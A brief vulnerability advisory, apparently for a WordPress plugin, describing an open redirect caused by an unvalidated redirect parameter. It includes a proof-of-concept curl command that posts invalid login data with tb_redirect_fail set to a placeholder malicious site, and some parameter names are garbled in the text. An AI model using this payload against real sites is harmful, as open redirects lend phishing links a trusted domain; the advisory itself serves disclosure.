Description The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue
curl -kvL https://www.example.com/wp-login.php \ -e http://arbitrary-referer \ -d “log=invalid_username&pwd;=invalid_password&tb;_login=1&tb;_redirect_fail=https://malicious-site.com” - https://www.example.com
should be replaced with the affected WordPress site URL. - The request triggers a 302 redirect to the URL specified in tb_redirect_fail
.